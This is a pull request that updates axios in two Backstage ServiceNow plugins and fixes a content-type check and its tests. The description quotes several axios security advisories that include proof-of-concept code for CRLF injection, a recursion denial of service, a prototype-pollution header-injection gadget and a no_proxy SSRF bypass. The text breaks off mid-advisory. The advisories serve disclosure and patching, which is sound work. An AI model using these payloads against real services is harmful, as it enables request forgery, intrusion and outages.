### PR TITLE
fix(servicenow): bump axios to 1.16.0 to include different security fixes

### DIFF
--- a/workspaces/scaffolder-backend-module-servicenow/.changeset/hip-rice-pump.md
+++ b/workspaces/scaffolder-backend-module-servicenow/.changeset/hip-rice-pump.md
@@ -1,0 +1,5 @@
+---
+'@backstage-community/plugin-scaffolder-backend-module-servicenow': patch
+---
+
+Bump axios to 1.16.0 to include different security fixes.

--- a/workspaces/scaffolder-backend-module-servicenow/plugins/scaffolder-backend-module-servicenow/package.json
+++ b/workspaces/scaffolder-backend-module-servicenow/plugins/scaffolder-backend-module-servicenow/package.json
@@ -43,7 +43,7 @@
     "@backstage/backend-plugin-api": "^1.8.0",
     "@backstage/plugin-scaffolder-node": "^0.13.0",
     "abort-controller": "^3.0.0",
-    "axios": "^1.7.4",
+    "axios": "^1.16.0",
     "form-data": "^4.0.0",
     "yaml": "^2.3.3"
   },

--- a/workspaces/scaffolder-backend-module-servicenow/yarn.lock
+++ b/workspaces/scaffolder-backend-module-servicenow/yarn.lock
@@ -1167,7 +1167,7 @@ __metadata:
     "@hey-api/openapi-ts": "npm:0.95.0"
     "@types/node-fetch": "npm:2.6.13"
     abort-controller: "npm:^3.0.0"
-    axios: "npm:^1.7.4"
+    axios: "npm:^1.16.0"
     form-data: "npm:^4.0.0"
     msw: "npm:1.3.5"
     yaml: "npm:^2.3.3"
@@ -7878,14 +7878,14 @@ __metadata:
   languageName: node
   linkType: hard
 
-"axios@npm:^1.12.0, axios@npm:^1.7.4":
-  version: 1.15.0
-  resolution: "axios@npm:1.15.0"
+"axios@npm:^1.12.0, axios@npm:^1.16.0":
+  version: 1.16.0
+  resolution: "axios@npm:1.16.0"
   dependencies:
-    follow-redirects: "npm:^1.15.11"
+    follow-redirects: "npm:^1.16.0"
     form-data: "npm:^4.0.5"
     proxy-from-env: "npm:^2.1.0"
-  checksum: 10/d39a2c0ebc7ff4739401b282e726cc2673377949d6c46d60eb619458f8d7a2f7eadbcada7097f4dbc7d5c59abb4d3bf6fac33d474412bc3415d3f5aa7ed45530
+  checksum: 10/cf8b521ff732c21550b38c8739aef556ea5e14b268468bb89e4307416ab262b462e582474e810963a3d61c2392ab47ad35c11d05eff027de7c97113bc7411623
   languageName: node
   linkType: hard
 
@@ -11464,13 +11464,13 @@ __metadata:
   languageName: node
   linkType: hard
 
-"follow-redirects@npm:^1.0.0, follow-redirects@npm:^1.15.11, follow-redirects@npm:^1.15.6":
-  version: 1.15.11
-  resolution: "follow-redirects@npm:1.15.11"
+"follow-redirects@npm:^1.0.0, follow-redirects@npm:^1.15.6, follow-redirects@npm:^1.16.0":
+  version: 1.16.0
+  resolution: "follow-redirects@npm:1.16.0"
   peerDependenciesMeta:
     debug:
       optional: true
-  checksum: 10/07372fd74b98c78cf4d417d68d41fdaa0be4dcacafffb9e67b1e3cf090bc4771515e65020651528faab238f10f9b9c0d9707d6c1574a6c0387c5de1042cde9ba
+  checksum: 10/3fbe3d80b3b544c22705d837aa5d4a0d07a740d913534a2620b0a004c610af4148e3b58723536dd099aaa1c9d3a155964bde9665d6e5cb331460809a1fc572fd
   languageName: node
   linkType: hard
 

--- a/workspaces/servicenow/.changeset/curly-teams-admire.md
+++ b/workspaces/servicenow/.changeset/curly-teams-admire.md
@@ -1,0 +1,5 @@
+---
+'@backstage-community/plugin-servicenow-backend': patch
+---
+
+Bump axios to 1.16.0 to include different security fixes.

--- a/workspaces/servicenow/plugins/servicenow-backend/package.json
+++ b/workspaces/servicenow/plugins/servicenow-backend/package.json
@@ -39,7 +39,7 @@
     "@backstage/config": "^1.3.7",
     "@backstage/errors": "^1.3.0",
     "@backstage/plugin-catalog-node": "^2.2.0",
-    "axios": "^1.9.0",
+    "axios": "^1.16.0",
     "express": "^4.17.1",
     "express-promise-router": "^4.1.0",
     "simple-oauth2": "^5.1.0"

--- a/workspaces/servicenow/plugins/servicenow-backend/src/service-now-rest/schema-checker.test.ts
+++ b/workspaces/servicenow/plugins/servicenow-backend/src/service-now-rest/schema-checker.test.ts
@@ -14,6 +14,8 @@
  * limitations under the License.
  */
 
+import { AxiosHeaders, type RawAxiosHeaders } from 'axios';
+
 import { ServiceNowSchemaChecker } from './schema-checker';
 import { ServiceNowConnection } from './connection';
 
@@ -49,47 +51,61 @@ describe('ServiceNowSchemaChecker', () => {
       expect(mockAxiosInstance.get).not.toHaveBeenCalled();
     });
 
-    it('should return true when all fields exist', async () => {
-      mockConnection.getAuthHeaders.mockResolvedValue({
-        Authorization: 'Bearer token',
-      });
+    const headerCases: {
+      name: string;
+      headers: AxiosHeaders | RawAxiosHeaders;
+    }[] = [
+      {
+        name: 'string header',
+        headers: { 'content-type': 'application/json' },
+      },
+      {
+        name: 'array header',
+        headers: AxiosHeaders.from({ 'content-type': 'application/json' }),
+      },
+    ];
 
-      mockAxiosInstance.get.mockResolvedValue({
-        status: 200,
-        headers: {
-          'content-type': 'application/json',
-        },
-        data: {
-          result: [
-            { element: 'u_backstage_entity_id' },
-            { element: 'u_service' },
-            { element: 'category' },
-          ],
-        },
-      });
+    headerCases.forEach(headerCase => {
+      it(`should return true when all fields exist with ${headerCase.name}`, async () => {
+        mockConnection.getAuthHeaders.mockResolvedValue({
+          Authorization: 'Bearer token',
+        });
 
-      const checker = new ServiceNowSchemaChecker(mockConnection);
-      const result = await checker.fieldExists(
-        'u_backstage_entity_id',
-        'u_service',
-        'category',
-      );
+        mockAxiosInstance.get.mockResolvedValue({
+          status: 200,
+          headers: headerCase.headers,
+          data: {
+            result: [
+              { element: 'u_backstage_entity_id' },
+              { element: 'u_service' },
+              { element: 'category' },
+            ],
+          },
+        });
 
-      expect(result).toBe(true);
-      expect(mockAxiosInstance.get).toHaveBeenCalledWith(
-        expect.stringContaining('api/now/table/sys_dictionary'),
-        expect.objectContaining({
-          headers: expect.objectContaining({
-            Authorization: 'Bearer token',
-            Accept: 'application/json',
+        const checker = new ServiceNowSchemaChecker(mockConnection);
+        const result = await checker.fieldExists(
+          'u_backstage_entity_id',
+          'u_service',
+          'category',
+        );
+
+        expect(result).toBe(true);
+        expect(mockAxiosInstance.get).toHaveBeenCalledWith(
+          expect.stringContaining('api/now/table/sys_dictionary'),
+          expect.objectContaining({
+            headers: expect.objectContaining({
+              Authorization: 'Bearer token',
+              Accept: 'application/json',
+            }),
+            params: expect.objectContaining({
+              sysparm_query: 'name=incident',
+              sysparm_fields: 'element',
+              sysparm_limit: 500,
+            }),
           }),
-          params: expect.objectContaining({
-            sysparm_query: 'name=incident',
-            sysparm_fields: 'element',
-            sysparm_limit: 500,
-          }),
-        }),
-      );
+        );
+      });
     });
 
     it('should return false when one or more fields do not exist', async () => {
@@ -199,24 +215,61 @@ describe('ServiceNowSchemaChecker', () => {
       );
     });
 
-    it('should throw error when response is not JSON', async () => {
-      mockConnection.getAuthHeaders.mockResolvedValue({
-        Authorization: 'Bearer token',
+    const headerCases: {
+      name: string;
+      headers: AxiosHeaders | RawAxiosHeaders;
+      errorMessage: string;
+    }[] = [
+      {
+        name: 'missing content-type header',
+        headers: {},
+        errorMessage:
+          'Failed to fetch incident schema: Expected JSON response but got Content-Type: undefined',
+      },
+      {
+        name: 'string header',
+        headers: { 'content-type': 'text/html' },
+        errorMessage:
+          'Failed to fetch incident schema: Expected JSON response but got Content-Type: text/html',
+      },
+      {
+        name: 'number header',
+        headers: { 'content-type': 123 },
+        errorMessage:
+          'Failed to fetch incident schema: ServiceNow API returned invalid JSON response',
+      },
+      {
+        name: 'array header',
+        headers: { 'content-type': ['text/html'] },
+        errorMessage:
+          'Failed to fetch incident schema: Expected JSON response but got Content-Type: text/html',
+      },
+      {
+        name: 'array header',
+        headers: AxiosHeaders.from({ 'content-type': 'text/html' }),
+        errorMessage:
+          'Failed to fetch incident schema: Expected JSON response but got Content-Type: text/html',
+      },
+    ];
+
+    headerCases.forEach(headerCase => {
+      it(`should throw error when response is not JSON (${headerCase.name})`, async () => {
+        mockConnection.getAuthHeaders.mockResolvedValue({
+          Authorization: 'Bearer token',
+        });
+
+        mockAxiosInstance.get.mockResolvedValue({
+          status: 200,
+          headers: headerCase.headers,
+          data: '<html>...</html>',
+        });
+
+        const checker = new ServiceNowSchemaChecker(mockConnection);
+
+        await expect(checker.fieldExists('field1')).rejects.toThrow(
+          headerCase.errorMessage,
+        );
       });
-
-      mockAxiosInstance.get.mockResolvedValue({
-        status: 200,
-        headers: {
-          'content-type': 'text/html',
-        },
-        data: '<html>...</html>',
-      });
-
-      const checker = new ServiceNowSchemaChecker(mockConnection);
-
-      await expect(checker.fieldExists('field1')).rejects.toThrow(
-        'Failed to fetch incident schema: Expected JSON response but got Content-Type: text/html',
-      );
     });
 
     it('should throw error when response data is invalid', async () => {

--- a/workspaces/servicenow/plugins/servicenow-backend/src/service-now-rest/schema-checker.ts
+++ b/workspaces/servicenow/plugins/servicenow-backend/src/service-now-rest/schema-checker.ts
@@ -51,8 +51,17 @@ export class ServiceNowSchemaChecker {
         throw new Error(`ServiceNow API returned status ${response.status}`);
       }
 
-      const contentType = response.headers['content-type'] ?? '';
-      if (!contentType.includes('application/json')) {
+      const contentType = response.headers['content-type'];
+      if (
+        !contentType ||
+        (typeof contentType === 'string' &&
+          !contentType.includes('application/json')) ||
+        (Array.isArray(contentType) &&
+          !contentType.some(ct => ct.includes('application/json'))) ||
+        (!Array.isArray(contentType) &&
+          typeof contentType === 'object' &&
+          !contentType.hasContentType('application/json'))
+      ) {
         throw new Error(
           `Expected JSON response but got Content-Type: ${contentType}`,
         );

--- a/workspaces/servicenow/yarn.lock
+++ b/workspaces/servicenow/yarn.lock
@@ -2003,7 +2003,7 @@ __metadata:
     "@types/qs": "npm:^6"
     "@types/simple-oauth2": "npm:^5"
     "@types/supertest": "npm:^7.0.0"
-    axios: "npm:^1.9.0"
+    axios: "npm:^1.16.0"
     express: "npm:^4.17.1"
     express-promise-router: "npm:^4.1.0"
     qs: "npm:^6.14.0"
@@ -10968,14 +10968,14 @@ __metadata:
   languageName: node
   linkType: hard
 
-"axios@npm:^1.12.0, axios@npm:^1.9.0":
-  version: 1.15.0
-  resolution: "axios@npm:1.15.0"
+"axios@npm:^1.12.0, axios@npm:^1.16.0":
+  version: 1.16.0
+  resolution: "axios@npm:1.16.0"
   dependencies:
-    follow-redirects: "npm:^1.15.11"
+    follow-redirects: "npm:^1.16.0"
     form-data: "npm:^4.0.5"
     proxy-from-env: "npm:^2.1.0"
-  checksum: 10/d39a2c0ebc7ff4739401b282e726cc2673377949d6c46d60eb619458f8d7a2f7eadbcada7097f4dbc7d5c59abb4d3bf6fac33d474412bc3415d3f5aa7ed45530
+  checksum: 10/cf8b521ff732c21550b38c8739aef556ea5e14b268468bb89e4307416ab262b462e582474e810963a3d61c2392ab47ad35c11d05eff027de7c97113bc7411623
   languageName: node
   linkType: hard
 
@@ -15140,13 +15140,13 @@ __metadata:
   languageName: node
   linkType: hard
 
-"follow-redirects@npm:^1.0.0, follow-redirects@npm:^1.15.11, follow-redirects@npm:^1.15.6":
-  version: 1.15.11
-  resolution: "follow-redirects@npm:1.15.11"
+"follow-redirects@npm:^1.0.0, follow-redirects@npm:^1.15.6, follow-redirects@npm:^1.16.0":
+  version: 1.16.0
+  resolution: "follow-redirects@npm:1.16.0"
   peerDependenciesMeta:
     debug:
       optional: true
-  checksum: 10/07372fd74b98c78cf4d417d68d41fdaa0be4dcacafffb9e67b1e3cf090bc4771515e65020651528faab238f10f9b9c0d9707d6c1574a6c0387c5de1042cde9ba
+  checksum: 10/3fbe3d80b3b544c22705d837aa5d4a0d07a740d913534a2620b0a004c610af4148e3b58723536dd099aaa1c9d3a155964bde9665d6e5cb331460809a1fc572fd
   languageName: node
   linkType: hard
 


### PR DESCRIPTION
## Hey, I just made a Pull Request!

This updates the two servicenow workspaces (we should merge them...) to resolve some axios security issues.

This is extracted from #8995 which fails because the axios update changed the header type. The new type is not simply a string, it can be also a string[] or an `AxiosHeaders` instance. I extended the condition with 3 different checks... :man_shrugging: 

```tsx
export type AxiosHeaderValue = AxiosHeaders | string | string[] | number | boolean | null;
```

Copied from #8995:

---

### Axios: CRLF Injection in multipart/form-data body via unsanitized blob.type in formDataToStream
[CVE-2026-42037](https://nvd.nist.gov/vuln/detail/CVE-2026-42037) / [GHSA-445q-vr5w-6q77](https://redirect.github.com/advisories/GHSA-445q-vr5w-6q77)

<details>
<summary>More information</summary>

#### Details
##### Summary
The `FormDataPart` constructor in `lib/helpers/formDataToStream.js` interpolates `value.type` directly into the `Content-Type` header of each multipart part without sanitizing CRLF (`\r\n`) sequences. An attacker who controls the `.type` property of a Blob/File-like object (e.g., via a user-uploaded file in a Node.js proxy service) can inject arbitrary MIME part headers into the multipart form-data body. This bypasses Node.js v18+ built-in header protections because the injection targets the multipart body structure, not HTTP request headers.

##### Details
In `lib/helpers/formDataToStream.js` at line 27, when processing a Blob/File-like value, the code builds per-part headers by directly embedding value.type:
```
if (isStringValue) {
  value = textEncoder.encode(String(value).replace(/\r?\n|\r\n?/g, CRLF));
} else {
  // value.type is NOT sanitized for CRLF sequences
  headers += `Content-Type: ${value.type || 'application/octet-stream'}${CRLF}`;
}
```
Note that the string path (line above) explicitly sanitizes CRLF, but the binary/blob path does not. This inconsistency confirms the sanitization was intended but missed for `value.type`.

##### Attack chain:

1. Attacker uploads a file to a Node.js proxy service, supplying a crafted MIME type containing `\r\n` sequences
2. The proxy appends the file to a FormData and posts it via `axios.post(url, formData)`
3. axios calls `formDataToStream()`, which passes `value.type` unsanitized into the multipart body
4. The downstream server receives a multipart body containing injected per-part headers
5. The server's multipart parser processes the injected headers as legitimate

This is reachable via the fully public axios API (`axios.post(url, formData)`) with no special configuration.
Additionally, `value.name` used in the `Content-Disposition` construction nearby likely has the same issue and should be audited.

##### PoC
**Prerequisites**: Node.js 18+, axios (tested on 1.14.0)
```
const http = require('http');
const axios = require('axios');

let receivedBody = '';

const server = http.createServer((req, res) => {
  let body = '';
  req.on('data', chunk => { body += chunk.toString(); });
  req.on('end', () => {
    receivedBody = body;
    res.writeHead(200);
    res.end('ok');
  });
});

server.listen(0, '127.0.0.1', async () => {
  const port = server.address().port;

  class SpecFormData {
    constructor() {
      this._entries = [];
      this[Symbol.toStringTag] = 'FormData';
    }
    append(name, value) { this._entries.push([name, value]); }
    [Symbol.iterator]() { return this._entries[Symbol.iterator](); }
    entries() { return this._entries[Symbol.iterator](); }
  }

  const fd = new SpecFormData();

  fd.append('photo', {
    type: 'image/jpeg\r\nX-Injected-Header: PWNED-by-attacker\r\nX-Evil: arbitrary-value',
    size: 16,
    name: 'photo.jpg',
    [Symbol.asyncIterator]: async function*() {
      yield Buffer.from('MALICIOUS PAYLOAD');
    }
  });

  await axios.post(`http://127.0.0.1:${port}/upload`, fd);

  if (receivedBody.includes('X-Injected-Header: PWNED-by-attacker')) {
    console.log('[VULNERABLE] CRLF injection confirmed in multipart body');
    console.log('Received body:\n' + receivedBody);
  } else {
    console.log('[NOT_VULNERABLE]');
  }

  server.close();
});
```

##### Steps to reproduce:

1. npm install axios
2. Save the above as poc_axios_crlf.js
3. Run node poc_axios_crlf.js
4. Observe the output shows [VULNERABLE] with injected headers visible in the multipart body

**Expected behavior**: value.type should be sanitized to strip \r\n before interpolation, consistent with the string value path.
**Actual behavior**: CRLF sequences in value.type are preserved, allowing arbitrary header injection in multipart parts.

##### Impact
Any Node.js application that accepts user-provided files (with attacker-controlled MIME types) and re-posts them via axios FormData is affected. This is a common pattern in proxy services, file upload relays, and API gateways.
Consequences include: bypassing server-side Content-Type-based upload filters, confusing multipart parsers into misrouting data, injecting phantom form fields if the boundary is known, and exploiting downstream server vulnerabilities that trust per-part headers.
axios is one of the most downloaded npm packages, significantly increasing the blast radius of this issue.

##### Suggested fix
In formDataToStream.js, sanitize value.type before interpolating it into the per-part Content-Type header. Apply the same strategy used for string values (strip/replace \r\n) or use the same escapeName logic.
```
const safeType = (value.type || 'application/octet-stream')
  .replace(/[\r\n]/g, '');
headers += `Content-Type: ${safeType}${CRLF}`;
```

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N`

#### References
- [https://github.com/axios/axios/security/advisories/GHSA-445q-vr5w-6q77](https://redirect.github.com/axios/axios/security/advisories/GHSA-445q-vr5w-6q77)
- [https://nvd.nist.gov/vuln/detail/CVE-2026-42037](https://nvd.nist.gov/vuln/detail/CVE-2026-42037)
- [https://github.com/axios/axios](https://redirect.github.com/axios/axios)

This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-445q-vr5w-6q77) and the [GitHub Advisory Database](https://redirect.github.com/github/advisory-database) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Axios' HTTP adapter-streamed uploads bypass maxBodyLength when maxRedirects: 0
[CVE-2026-42034](https://nvd.nist.gov/vuln/detail/CVE-2026-42034) / [GHSA-5c9x-8gcm-mpgx](https://redirect.github.com/advisories/GHSA-5c9x-8gcm-mpgx)

<details>
<summary>More information</summary>

#### Details
##### Summary

For stream request bodies, maxBodyLength is bypassed when maxRedirects is set to 0 (native http/https transport path). Oversized streamed uploads are sent fully even when the caller sets strict body limits.

##### Details

Relevant flow in lib/adapters/http.js:
  - 556-564: maxBodyLength check applies only to buffered/non-stream data.
  - 681-682: maxRedirects === 0 selects native http/https transport.
  - 694-699: options.maxBodyLength is set, but native transport does not enforce it.
  - 925-945: stream is piped directly to socket (data.pipe(req)) with no Axios byte counting.

This creates a path-specific bypass for streamed uploads.

  ### PoC

Environment:

  - Axios main at commit f7a4ee2
  - Node v24.2.0

  Steps:
  1. Start an HTTP server that counts uploaded bytes and returns {received}.
  2. Send a 2 MiB Readable stream with:
      - adapter: 'http'
      - maxBodyLength: 1024
      - maxRedirects: 0

  Observed:
  - Request succeeds; server reports received: 2097152.

  Control checks:
  - Same stream with default/nonzero redirects: rejected with ERR_FR_MAX_BODY_LENGTH_EXCEEDED.
  - Buffered body with maxRedirects: 0: rejected with ERR_BAD_REQUEST.

  ### Impact
Type: DoS / uncontrolled upstream upload / resource exhaustion.
Impacted: Node.js services using streamed request bodies with maxBodyLength expecting hard enforcement, especially when following Axios guidance to use maxRedirects: 0 for streams.

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L`

#### References
- [https://github.com/axios/axios/security/advisories/GHSA-5c9x-8gcm-mpgx](https://redirect.github.com/axios/axios/security/advisories/GHSA-5c9x-8gcm-mpgx)
- [https://nvd.nist.gov/vuln/detail/CVE-2026-42034](https://nvd.nist.gov/vuln/detail/CVE-2026-42034)
- [https://github.com/axios/axios](https://redirect.github.com/axios/axios)

This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-5c9x-8gcm-mpgx) and the [GitHub Advisory Database](https://redirect.github.com/github/advisory-database) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Axios: unbounded recursion in toFormData causes DoS via deeply nested request data
[CVE-2026-42039](https://nvd.nist.gov/vuln/detail/CVE-2026-42039) / [GHSA-62hf-57xw-28j9](https://redirect.github.com/advisories/GHSA-62hf-57xw-28j9)

<details>
<summary>More information</summary>

#### Details
##### Summary
toFormData recursively walks nested objects with no depth limit, so a deeply nested value passed as request data crashes the Node.js process with a RangeError.

##### Details
lib/helpers/toFormData.js:210 defines an inner `build(value, path)` that recurses into every object/array child (line 225: `build(el, path ? path.concat(key) : [key])`). The only safeguard is a `stack` array used to detect circular references; there is no maximum depth and no try/catch around the recursion. Because `build` calls itself once per nesting level, a payload nested roughly 2000+ levels deep exhausts V8's call stack.

`toFormData` is the serializer behind `FormData` request bodies and `AxiosURLSearchParams` (used by `buildURL` when `params` is an object with `URLSearchParams` unavailable, see `lib/helpers/buildURL.js:53` and `lib/helpers/AxiosURLSearchParams.js:36`). Any server-side code that forwards a client-supplied object into `axios({ data, params })` therefore reaches the recursive walker with attacker-controlled depth.

The RangeError is thrown synchronously from inside `forEach`, escapes `toFormData`, and propagates out of the axios request call. In typical Express/Fastify request handlers this terminates the running request; in synchronous startup paths or worker threads it can crash the whole process.

##### PoC
```js
import toFormData from 'axios/lib/helpers/toFormData.js';
import FormData from 'form-data';

function nest(depth) {
  let o = { leaf: 1 };
  for (let i = 0; i < depth; i++) o = { a: o };
  return o;
}

try {
  toFormData(nest(2500), new FormData());
} catch (e) {
  console.log(e.name + ': ' + e.message);
}
// RangeError: Maximum call stack size exceeded
```

Server-side reachability example:
```js
// vulnerable proxy pattern
app.post('/forward', async (req, res) => {
  await axios.post('https://upstream/api', req.body); // req.body user-controlled
  res.send('ok');
});
// attacker POST /forward with {"a":{"a":{"a":... 2500 deep ...}}}
// -> toFormData build() overflows -> request handler crashes
```

Verified on axios 1.15.0 (latest, 2026-04-10), Node.js 20, 3/3 PoC runs reproduce the RangeError at depth 2500.

##### Impact
A remote, unauthenticated attacker who can influence an object passed to axios as request `data` or `params` triggers an uncaught RangeError inside the synchronous recursive walker. In server-side applications that proxy or re-send client JSON through axios this crashes the request handler and, in worker/cluster setups, the process. Fix by bounding recursion depth in `toFormData`'s `build` function (reject or throw on depths beyond a configurable limit, e.g. 100) or rewriting the walker iteratively.

#### Severity
- CVSS Score: 6.9 / 10 (Medium)
- Vector String: `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N`

#### References
- [https://github.com/axios/axios/security/advisories/GHSA-62hf-57xw-28j9](https://redirect.github.com/axios/axios/security/advisories/GHSA-62hf-57xw-28j9)
- [https://nvd.nist.gov/vuln/detail/CVE-2026-42039](https://nvd.nist.gov/vuln/detail/CVE-2026-42039)
- [https://github.com/axios/axios](https://redirect.github.com/axios/axios)

This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-62hf-57xw-28j9) and the [GitHub Advisory Database](https://redirect.github.com/github/advisory-database) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Axios: Header Injection via Prototype Pollution
[CVE-2026-42035](https://nvd.nist.gov/vuln/detail/CVE-2026-42035) / [GHSA-6chq-wfr3-2hj9](https://redirect.github.com/advisories/GHSA-6chq-wfr3-2hj9)

<details>
<summary>More information</summary>

#### Details
##### Summary

A prototype pollution gadget exists in the Axios HTTP adapter (lib/adapters/http.js) that allows an attacker to inject arbitrary HTTP headers into outgoing requests. The vulnerability exploits duck-type checking of the data payload, where if Object.prototype is polluted with getHeaders, append, pipe, on, once, and Symbol.toStringTag, Axios misidentifies any plain object payload as a FormData instance and calls the attacker-controlled getHeaders() function, merging the returned headers into the outgoing request.

The vulnerable code resides exclusively in lib/adapters/http.js. The prototype pollution source does not need to originate from Axios itself — any prototype pollution primitive in any dependency in the application's dependency tree is sufficient to trigger this gadget.

Prerequisites:

A prototype pollution primitive must exist somewhere in the application's dependency chain (e.g., via lodash.merge, qs, JSON5, or any deep-merge utility processing attacker-controlled input). The pollution source is not required to be in Axios.
The application must use Axios to make HTTP requests with a data payload (POST, PUT, PATCH).

##### Details

The vulnerability is in `lib/adapters/http.js`, in the data serialization pipeline:

```javascript
// lib/adapters/http.js 
} else if (utils.isFormData(data) && utils.isFunction(data.getHeaders)) {
    headers.set(data.getHeaders());
    // ...
}
```

Axios uses two sequential duck-type checks, both of which can be satisfied via prototype pollution:

**1. `utils.isFormData(data)` — `lib/utils.js`**
```javascript
const isFormData = (thing) => {
  let kind;
  return thing && (
    (typeof FormData === 'function' && thing instanceof FormData) || (
      isFunction(thing.append) && ( 
        (kind = kindOf(thing)) === 'formdata' ||  
        (kind === 'object' && isFunction(thing.toString) && thing.toString() === '[object FormData]')
      )
    )
  )
}
```

**2. `utils.isFunction(data.getHeaders)` — Duck-type for `form-data` npm package**
```javascript
// Returns true if Object.prototype.getHeaders is a function
utils.isFunction(data.getHeaders) 
```

##### PoC

```javascript
// Simulate Prototype Pollution
Object.prototype[Symbol.toStringTag] = 'FormData';
Object.prototype.append = () => {};
Object.prototype.getHeaders = () => {
    const headers = Object.create(null);
    (.... Introduce here all the headers you want ....)
    return headers;
};
Object.prototype.pipe = function(d) { if(d&&d.end)d.end(); return d; };
Object.prototype.on = function() { return this; };
Object.prototype.once = function() { return this; };

// Legitimate application code
const response = await axios.post('https://internal-api.company.com/admin/delete', 
    { userId: 42 },
    { headers: { 'Authorization': 'Bearer VALID_USER_TOKEN' } }
);
```

##### Impact

- Authentication Bypass (CVSS: C:H)
- Session Fixation (CVSS: I:H)
- Privilege Escalation (CVSS: C:H, I:H)
- IP Spoofing / WAF Bypass (CVSS: I:H)

**Note on Scope**: There is an argument to promote this from **S:U to S:C** (Scope: Changed), which would raise the score to **10.0**. In some architectures, Axios is commonly used for service to service communication where downstream services trust identity headers (`Authorization`, `X-Role`, `X-User-ID`, `X-Tenant-ID`) forwarded from upstream API gateways. In this scenario, the vulnerable component (Axios in Service A) and the impacted component (Service B, which acts on the injected identity) are under different security authorities. The injected headers cross a trust boundary, meaning the impact extends beyond the security scope of the vulnerable component, the CVSS v3.1 definition of a Scope Change. We conservatively score S:U here, but maintainers should evaluate which one applies better here.

##### Recommended Fix

Add an explicit own-property check in `lib/adapters/http.js`:

```diff
- } else if (utils.isFormData(data) && utils.isFunction(data.getHeaders)) {
-     headers.set(data.getHeaders());
+ } else if (utils.isFormData(data) && utils.isFunction(data.getHeaders) &&
+            Object.prototype.hasOwnProperty.call(data, 'getHeaders')) {
+     headers.set(data.getHeaders());
```

#### Severity
- CVSS Score: 7.4 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N`

#### References
- [https://github.com/axios/axios/security/advisories/GHSA-6chq-wfr3-2hj9](https://redirect.github.com/axios/axios/security/advisories/GHSA-6chq-wfr3-2hj9)
- [https://nvd.nist.gov/vuln/detail/CVE-2026-42035](https://nvd.nist.gov/vuln/detail/CVE-2026-42035)
- [https://github.com/axios/axios](https://redirect.github.com/axios/axios)

This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-6chq-wfr3-2hj9) and the [GitHub Advisory Database](https://redirect.github.com/github/advisory-database) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Axios: no_proxy bypass via IP alias allows SSRF
[CVE-2026-42038](https://nvd.nist.gov/vuln/detail/CVE-2026-42038) / [GHSA-m7pr-hjqh-92cm](https://redirect.github.com/advisories/GHSA-m7pr-hjqh-92cm)

<details>
<summary>More information</summary>

#### Details
The fix for no_proxy hostname normalization bypass (#&#8203;10661) is incomplete.When no_proxy=localhost is set, requests to 127.0.0.1 and [::1] still route through the proxy instead of bypassing it.

The shouldBypassProxy() function does pure string matching — it does not 
resolve IP aliases or loopback equivalents. As a result:
- no_proxy=localhost does NOT block 127.0.0.1 or [::1]
- no_proxy=127.0.0.1 does NOT block localhost or [::1]

POC :
process.env.no_proxy = 'localhost';
process.env.http_proxy = 'http://attacker-proxy:8888';

```(base) srisowmyanemani@Srisowmyas-MacBook-Pro axios % >....                     
    process.env.http_proxy = 'http://127.0.0.1:8888';

    console.log('=== Test 1: localhost (should bypass proxy) ===');
    try {
      await axios.get('http://localhost:7777/');
    } catch(e) {
      console.log('Error:', e.message);
    }

    console.log('');
    console.log('=== Test 2: 127.0.0.1 (should ALSO bypass proxy but DOES NOT) ===');
    try {
      await axios.get('http://127.0.0.1:7777/');
    } catch(e) {
      console.log('Error:', e.message);
    }

    fakeProxy.close();
    internalServer.close();
  });
});
EOF
=== Test 1: localhost (should bypass proxy) ===
✅ Internal server hit directly (correct)

=== Test 2: 127.0.0.1 (should ALSO bypass proxy but DOES NOT) ===
🚨 PROXY RECEIVED REQUEST TO: http://127.0.0.1:7777/
🚨 Host header: 127.0.0.1:7777. ```
 

<img width="1212" height="247" alt="image" src="https://github.com/user-attachments/assets/0b07ddc4-507d-4b11-a630-15b94ad2c7e7" />

Impact: In server-side environments where no_proxy is used to prevent requests to internal/cloud metadata services (e.g., 169.254.169.254), an attacker who can influence the URL can bypass the restriction by using an IP alias instead of the hostname, routing the request through an attacker-controlled proxy and leaking internal data.

Fix: shouldBypassProxy() should resolve loopback aliases — localhost, 127.0.0.1, and ::1 should all be treated as equivalent.

#### Severity
- CVSS Score: 6.8 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N`

#### References
- [https://github.com/axios/axios/security/advisories/GHSA-m7pr-hjqh-92cm](https://redirect.github.com/axios/axios/security/advisories/GHSA-m7pr-hjqh-92cm)
- [https://nvd.nist.gov/vuln/detail/CVE-2026-42038](https://nvd.nist.gov/vuln/detail/CVE-2026-42038)
- [https://github.com/axios/axios](https://redirect.github.com/axios/axios)

This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-m7pr-hjqh-92cm) and the [GitHub Advisory Database](https://redirect.github.com/github/advisory-database) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Axios: Prototype Pollution Gadgets - Response Tampering, Data Exfiltration, and Request Hijacking
[CVE-2026-42033](https://nvd.nist.gov/vuln/detail/CVE-2026-42033) / [GHSA-pf86-5x62-jrwf](https://redirect.github.com/advisories/GHSA-pf86-5x62-jrwf)

<details>
<summary>More information</summary>

#### Details
##### Summary

